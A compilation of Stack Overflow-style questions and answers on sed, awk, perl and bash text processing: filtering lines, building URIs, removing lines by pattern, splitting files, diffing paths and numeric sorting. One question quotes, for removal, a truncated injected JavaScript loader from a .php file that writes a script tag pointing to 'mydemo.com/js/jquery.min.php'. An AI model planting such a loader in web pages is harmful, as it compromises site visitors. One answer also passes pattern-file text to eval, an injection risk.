After some string conversion of heterogeneous data, there are files with the following content:
file1.txt:
mat 445
file2.txt:
mat 734.2
and so on. But there are also intruders that do not match that pattern, e.g.
filen.txt:
mat 1
FBW
Every line that starts with "mat" I would like to process further, while all other lines shall be deleted.
The following does not work (and seems rather ponderous):
for f in *.txt ; do
    if [[ ${f:0:3} == "mat" ]]; then
        # do some string conversion with that line, which is not important here
        sed -i -e 's/^.*\(mat.*\).*$/\1/' $f
        sed -i -e 's/ //g' $f
        tr '.' '_' < $f
        sed -i -e 's/^/\<http:\/\/uricorn.fly\/tib\_lok\_sys\#/' "$f"
        sed -i -e 's/\(.*\)[0-9]/&> /' "$f"
    else
        # delete the line that does not match the pattern
        sed -i -e '^[mat]/d' $f
    fi
done
As the comments point out, the if condition is incorrect: it tests the file's name, not the file's content.
Desired output should then be:
file1.txt
<http://uricorn.fly/tib_lok_sys#mat445>
file2.txt
<http://uricorn.fly/tib_lok_sys#mat734_2>
filen.txt
<http://uricorn.fly/tib_lok_sys#mat1>
How can this be achieved?
Source data, with some extras added to the last 2 files:
$ for s in 1 2 n
do
fn="file${s}.txt"
echo "+++++++++++ ${fn}"
cat "${fn}"
done
+++++++++++ file1.txt
mat 445
+++++++++++ file2.txt
mat 734.2.3
+++++++++++ filen.txt
mat 1 2 3
FBW
One awk solution that implements the most recent set of question edits:
awk -i inplace '                     # overwrite the source file
/^mat/ { gsub(/ /,"")                # if line starts with "mat" then remove spaces ...
         gsub(/\./,"_")              # and replace periods with underscores
         printf "<http://uricorn.fly/tib_lok_sys#%s>\n", $0   # print the desired output
       }
' file{1,2,n}.txt
' file{1,2,n}.txt
NOTES:
the -i inplace option requires GNU awk 4.1.0 (or later)
remove comments to declutter code
The above generates the following:
$ for s in 1 2 n
do
fn="file${s}.txt"
echo "+++++++++++ ${fn}"
cat "${fn}"
done
+++++++++++ file1.txt
<http://uricorn.fly/tib_lok_sys#mat445>
+++++++++++ file2.txt
<http://uricorn.fly/tib_lok_sys#mat734_2_3>
+++++++++++ filen.txt
<http://uricorn.fly/tib_lok_sys#mat123>
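If GNU awk 4.1.0+ is not available, the same logic can be run with any awk and a temporary file. A sketch, recreating the sample files from the question first:

```shell
# recreate the sample data from the question
printf 'mat 445\n' > file1.txt
printf 'mat 734.2.3\n' > file2.txt
printf 'mat 1 2 3\nFBW\n' > filen.txt

# same logic as the gawk one-liner, but without -i inplace:
# write to a temp file, then move it over the original
for f in file1.txt file2.txt filen.txt; do
    awk '/^mat/ { gsub(/ /,""); gsub(/\./,"_")
                  printf "<http://uricorn.fly/tib_lok_sys#%s>\n", $0 }' "$f" > "$f.tmp" &&
    mv "$f.tmp" "$f"
done
```

The `&&` guards the `mv` so the original file is only replaced if awk succeeded.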
Sed:
sed -ri '/^mat/{s/[ ]//g;s/[.]/_/g;s|^.*$|<http://uricorn.fly/tib_lok_sys#&>|}' *.txt
Search for lines starting with mat; then remove spaces, replace . with _, and finally wrap the resulting string with the http prefix and angle brackets. The substitution uses | as the delimiter, since the replacement itself contains both / and #.
The other answers are far more elegant, but none worked on my system, so here is what eventually did:
for f in *.txt ; do
    # Remove every line that does not contain 'mat'
    sed -i '/mat/!d' "$f"
    # Remove every character until 'mat' begins
    sed -i -e 's/^.*\(mat.*\).*$/\1/' "$f"
    # Remove the blank between 'mat' and the number
    sed -i -e 's/ //g' "$f"
    # Replace the dots in subcategories with underscores
    sed -i -e 's/\./_/g' "$f"
    # Add URI
    sed -i -e 's/^/\<http:\/\/uricorn.fly\/tib\_lok\_sys\#/' "$f"
    sed -i -e 's/\(.*\)[0-9]/&> /' "$f"
    uniq "$f"
done
I'm trying to use a list of patterns to search in 4 large files, and remove the line that contains the regex.
I tried to specify the file path but it didn't work
sed -n '/{home/dirco/shut}/p' rimco rimco2 aval aval2
I tried to use sed option -f but it didn't work either
sed -f home/dirco/shut rimco rimco2 aval aval2
Ultimately the goal is to edit in place with sed, removing a line whenever one of the patterns matches.
This might work for you (GNU sed):
sed 's#/#\\/#g;s#.*#/&/p#g' patternFile | sed -nf - file1 file2 file3 ...
Turn the patternFile into a sed script and run it against the data files.
N.B. The sed delimiter / is first escaped, and then each line of the patternFile is turned into an address command which prints matching lines: /pattern/p.
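As a quick check of what the pipeline does (made-up pattern and data files; the names are illustrative):

```shell
# hypothetical pattern file and data file
printf '/home/dirco/shut\nfoo\n' > patternFile
printf 'keep this\n/home/dirco/shut was here\nfoo bar\nalso keep\n' > rimco

# the first sed generates a script like:
#   /\/home\/dirco\/shut/p
#   /foo/p
# which the second sed (GNU sed, reading the script from stdin) runs on the data
result=$(sed 's#/#\\/#g;s#.*#/&/p#g' patternFile | sed -nf - rimco)
echo "$result"
```

For the stated goal of removing matching lines, generate /&/d instead of /&/p, drop the -n, and add -i to edit in place.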
try this:
cmd=$(
    echo -n "sed -i '"
    while read -r line; do
        echo -n "/$line/d;"
    done < patternfile.txt
    echo "'"
)
eval "$cmd rimco rimco2 aval aval2"
Here's how to do what you want efficiently and robustly by using GNU awk for inplace editing (assuming your list of regexps in regexpsfile isn't massive):
awk -i inplace 'NR==FNR{re=re sep "(" $0 ")"; sep="|"} NR!=FNR && $0~re{next} 1' regexpsfile rimco rimco2 aval aval2
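To see the filtering logic in isolation (made-up files; this variant prints to stdout instead of rewriting in place, so a `next` is added to keep the regexps themselves out of the output):

```shell
# hypothetical list of regexps and a data file
printf 'bad1\nbad2\n' > regexpsfile
printf 'keep\nbad1 here\nfine\nhas bad2\n' > rimco

# build one alternation "(bad1)|(bad2)" from the first file,
# then drop any line of the second file that matches it
result=$(awk 'NR==FNR{re=re sep "(" $0 ")"; sep="|"; next} $0~re{next} 1' regexpsfile rimco)
echo "$result"
```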
I have a script in .php file which is the following :
var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('http://mydemo.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<'+'/script>');}
I would like to replace the whole line with a single empty character from the command line. Is it possible? I tried to do it with sed, but this is probably too complex a string. I also tried to set the string in a variable, but that didn't work either. Does anybody have any idea?
This is actually something sed excels in. :)
sed -i '1s/.*/ /' your-file
Example:
$ cat test
one
two
three
$ sed '1s/.*/ /' < test
 
two
three
(The first output line is a single space.)
On my OS X I tested this script:
for strnum in $(grep -n "qwe" test.txt | awk -F ':' '{print $1}'); do sed -i '.txt' "${strnum}s/.*/ /" test.txt; done
On CentOS this script should work:
for strnum in $(grep -n "qwe" test.txt | awk -F ':' '{print $1}'); do sed -i "${strnum}s/.*/ /" test.txt; done
You should replace qwe with your pattern. It will replace every line where the pattern is found with a space.
To pass the pattern to grep correctly, it has to be prepared first. Create a file containing the required pattern and run this command:
echo '"'$(cat your_file | sed -e 's|"|\\"|g')'"'
The output of this command should replace qwe (including the quotes).
You should get something like this:
for strnum in $(grep -n "var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+\"//\"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('http://mydemo.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<'+'/script>');}" test.txt | awk -F ':' '{print $1}'); do cat test.txt | sed -i $strnum's/.*/ /' test.txt; done
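Alternatively, if some substring of the offending line is distinctive (here setTimeout(10) is assumed to appear only on that line), sed can address the line by pattern directly, with no grep -n loop:

```shell
# hypothetical stand-in for the real .php file
cat > demo.php <<'EOF'
before
var a='';setTimeout(10);if(document.referrer){}
after
EOF

# replace any line containing the distinctive substring with a single space
sed -i '/setTimeout(10)/s/.*/ /' demo.php
cat demo.php
```

Only a short, unambiguous fragment needs escaping this way, rather than the entire line.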
In my script I am taking a text file and splitting it into sections. Before doing any splitting, I reformat the name of the text file. PROBLEM: creating a folder/directory named after the formatted file name, where the segments are placed. The script breaks when the text file's name contains spaces, which is exactly why I am trying to reformat the name first and then do the rest of the operations. How can I do it in that sequence?
execute script: text_split.sh -s "my File .txt" -c 2
text_split.sh
# remove whitespace and format file name
FILE_PATH="/archive/"
find $FILE_PATH -type f -exec bash -c 'mv "$1" "$(echo "$1" \
| sed -re '\''s/^([^-]*)-\s*([^\.]*)/\L\1\E-\2/'\'' -e '\''s/ /_/g'\'' -e '\''s/_-/-/g'\'')"' - {} \;
sleep 1
# arg1: path to input file / source
# create directory
function fallback_out_file_format() {
__FILE_NAME=`rev <<< "$1" | cut -d"." -f2- | rev`
__FILE_EXT=`rev <<< "$1" | cut -d"." -f1 | rev`
mkdir -p $FILE_PATH${__FILE_NAME};
__OUT_FILE_FORMAT="$FILE_PATH${__FILE_NAME}"/"${__FILE_NAME}-part-%03d.${__FILE_EXT}"
echo $__OUT_FILE_FORMAT
exit 1
}
# Set variables and default values
OUT_FILE_FORMAT=''
# Grab input arguments
while getopts "s:c:" OPTION
do
case $OPTION in
s) SOURCE=$(echo "$OPTARG" | sed 's/ /\\ /g' ) ;;
c) CHUNK_LEN="$OPTARG" ;;
?) usage
exit 1
;;
esac
done
if [ -z "$OUT_FILE_FORMAT" ] ; then
OUT_FILE_FORMAT=$(fallback_out_file_format $SOURCE)
fi
Your script takes a filename argument, specified with -s, then modifies a hard-coded directory by renaming the files it contains, then uses the initial filename to generate an output directory and filename. It definitely sounds like the workflow should be adjusted. For instance, instead of trying to correct all the bad filenames in /archive/, just fix the name of the file specified with -s.
To get filename and extension, use bash's string manipulation ability, as shown in this question:
filename="${fullfile##*/}"
extension="${filename##*.}"
name="${filename%.*}"
You can trim whitespace from the input string using tr -d ' '.
You can then join this to your FILE_PATH variable with something like this:
FILE_NAME=$(echo "$1" | tr -d ' ')
FILE_PATH="/archive/"
FILE_PATH=$FILE_PATH$FILE_NAME
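Putting those pieces together (a sketch, using the example filename from the question):

```shell
# hypothetical input path, as passed via -s
fullfile='/archive/my File .txt'

filename="${fullfile##*/}"    # strip the directory part
extension="${filename##*.}"   # everything after the last dot
name="${filename%.*}"         # everything before the last dot

# remove the spaces and rebuild the name
FILE_NAME=$(echo "$name" | tr -d ' ')
echo "${FILE_NAME}.${extension}"
```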
You can escape the space using a backslash \.
Now the user may not always provide the backslash, so the script can use sed to convert every space to \ :
sed 's/ /\\ /g'
You can obtain the new directory name as
dir_name=$(echo "$1" | sed 's/ /\\ /g')
I have two files which contain paths. I want to compare the two files and show only the uncommon part of each line.
1.txt:
/home/folder_name/abc
2.txt:
/home/folder_name/abc/pqr/xyz/mnp
Output I want:
/pqr/xyz/mnp
How can I do this?
This bit of awk does the job:
$ awk 'NR==FNR {a[++i]=$0; next}
{
b[++j]=$0;
if(length(a[j])>length(b[j])) {t=a[j]; a[j]=b[j]; b[j]=t}
sub(a[j],"",b[j]);
print b[j]
}' 2.txt 1.txt # or 1.txt 2.txt, the order doesn't matter
Write the line from the first file to the array a.
Write the line from the second to b.
Swap a[j] and b[j] if a[j] is longer than b[j] (this might not be necessary if the longer text is always in b).
Remove the part found in a[j] from b[j] and print b[j].
This is a general solution; it makes no assumption that the match is at the start of the line, or that the contents of one file's line should be removed from the other. If you can afford to make those assumptions, the script can be simplified.
If the match may occur more than once on the line, you can use gsub rather than sub to perform a global substitution.
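A quick check of the script against the sample files from the question:

```shell
# sample files from the question
printf '/home/folder_name/abc\n' > 1.txt
printf '/home/folder_name/abc/pqr/xyz/mnp\n' > 2.txt

# same script as above: collect one file into a, the other into b,
# keep the shorter line in a, and strip it from the longer line
result=$(awk 'NR==FNR {a[++i]=$0; next}
              {
                b[++j]=$0
                if (length(a[j])>length(b[j])) {t=a[j]; a[j]=b[j]; b[j]=t}
                sub(a[j],"",b[j])
                print b[j]
              }' 2.txt 1.txt)
echo "$result"
```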
Assuming you have the strings in 1.txt and 2.txt, the following code will do:
paste 1.txt 2.txt |
while read a b;
do
if [[ ${#a} -gt ${#b} ]];
then
echo ${a/$b};
else
echo ${b/$a};
fi;
done;
This is how it works on my system,
shiplu#:~/test/bash$ cat 1.txt
/home/shiplu/test/bash
/home/shiplu/test/bash/hello/world
shiplu#:~/test/bash$ cat 2.txt
/home/shiplu/test/bash/good/world
/home/shiplu/test/bash
shiplu#:~/test/bash$ paste 1.txt 2.txt |
> while read a b;
> do
> if [[ ${#a} -gt ${#b} ]];
> then
> echo ${a/$b};
> else
> echo ${b/$a};
> fi;
> done;
/good/world
/hello/world
This script will compare all lines in the two files and only output the change in each line.
First it counts the number of lines in the first file.
Then I start a loop that iterates that many times.
Declare two variables that hold the same line from both files.
Compare the lines, and if they are the same, output that they are.
If they are not, replace the duplicate part of the string with nothing (effectively removing it).
I used : as the separator in sed because your variables contain /. If they can also contain : then you may want to consider changing it.
Probably not the most efficient solution, but it works.
#!/bin/bash
NUMOFLINES=$(wc -l < "1.txt")
echo $NUMOFLINES
for ((i = 1 ; i <= $NUMOFLINES ; i++)); do
f1=$(sed -n $i'p' 1.txt)
f2=$(sed -n $i'p' 2.txt)
if [[ $f1 < $f2 ]]; then
echo -n "Line $i:"
sed 's:'"$f1"'::' <<< "$f2"
elif [[ $f1 > $f2 ]]; then
echo -n "Line $i:"
sed 's:'"$f2"'::' <<< "$f1"
else
echo "Line $i: Both lines are the same"
fi
echo ""
done
If you happen to use bash, you could try this one:
echo $(diff <(grep -o . 1.txt) <(grep -o . 2.txt) \
| sed -n '/^[<>]/ {s/^..//;p}' | tr -d '\n')
It does a character-by-character comparison using diff (where grep -o . gives an intermediate line for each character to be fed to line-wise diff), and just prints the differences (intermediate diff output lines starting with markers < or > omitted, then joining lines with tr).
If you have multiple lines in your input (which you did not mention in your question) then try something like this (where % is a character not contained in your input):
diff <(cat 1.txt | tr '\n' '%' | grep -o .) \
<(cat 2.txt | tr '\n' '%' | sed -e 's/%/%%/g' | grep -o .) \
| sed -n '/^[<>]/ {s/^..//;p}' | tr -d '\n' | tr '%' '\n'
This extends the single-line solution by adding line end markers (e.g. %) which diff is forced to include in its output by adding % on the left and %% on the right.
If both files always have a single line each, then the below works:
perl -lne '$a=$_ if($.==1);print $1 if(/$a(.*)/ && $.==2)' 1.txt 2.txt
Tested Below:
> cat 1.txt
/home/folder_name/abc
> cat 2.txt
/home/folder_name/abc/pqr/xyz/mnp
> perl -lne '$a=$_ if($.==1);print $1 if(/$a(.*)/ && $.==2)' 1.txt 2.txt
/pqr/xyz/mnp
>
I have something about 100 files with the following syntax
ahfsdjfhdfhj_EPI_34_fdsafasdf
asdfasdf_EPI_2_fdsf
hfdjh_EPI_8_dhfffffffffff
ffffffffffasdfsdf_EPI_1_fyyy44
...
There is always EPI_NUMBER. How can I sort it by this number?
From your example it appears that the delimiter is _ and the text EPI_nnn always appears at the same field position. If that is always the case, then you can use the following command to sort the file:
sort -n -t "_" -k 3 file.txt
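A quick check with the sample data (written to a scratch file here just for the demonstration):

```shell
# sample data from the question
cat > file.txt <<'EOF'
ahfsdjfhdfhj_EPI_34_fdsafasdf
asdfasdf_EPI_2_fdsf
hfdjh_EPI_8_dhfffffffffff
ffffffffffasdfsdf_EPI_1_fyyy44
EOF

# split on _, sort numerically starting at field 3 (the number after EPI)
result=$(sort -n -t "_" -k 3 file.txt)
echo "$result"
```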
UPDATE:
If the position of the EPI_ text is not fixed, use the following shell command:
sed 's/^\(.*EPI_\)\(.*\)$/\2##\1/' file.txt | sort -n -t "_" -k1 | sed 's/^\(.*\)##\(.*\)$/\2\1/'
If Perl is okay you can:
print sort foo <>;

sub foo {
    ($x = $a) =~ s/.*EPI_(\d+).*/$1/;
    ($y = $b) =~ s/.*EPI_(\d+).*/$1/;
    return $x <=> $y;
}
and use it as:
perl prg.pl inputfile
sed -e 's/EPI_/EPI /' file1 file2 ...|sort -n -k 2 -t ' '
Pipe that to sed -e 's/ /_/' to get back the original form.
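Both steps together, on the sample data:

```shell
# sample data from the question
cat > files.txt <<'EOF'
ahfsdjfhdfhj_EPI_34_fdsafasdf
asdfasdf_EPI_2_fdsf
hfdjh_EPI_8_dhfffffffffff
ffffffffffasdfsdf_EPI_1_fyyy44
EOF

# decorate (EPI_ -> "EPI "), sort numerically on the new second field,
# then turn the first space back into an underscore
result=$(sed -e 's/EPI_/EPI /' files.txt | sort -n -k 2 -t ' ' | sed -e 's/ /_/')
echo "$result"
```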
This might work for you:
ls | sed 's/.*EPI_\([0-9]*\)/\1 &/' | sort -n | sed 's/\S* //'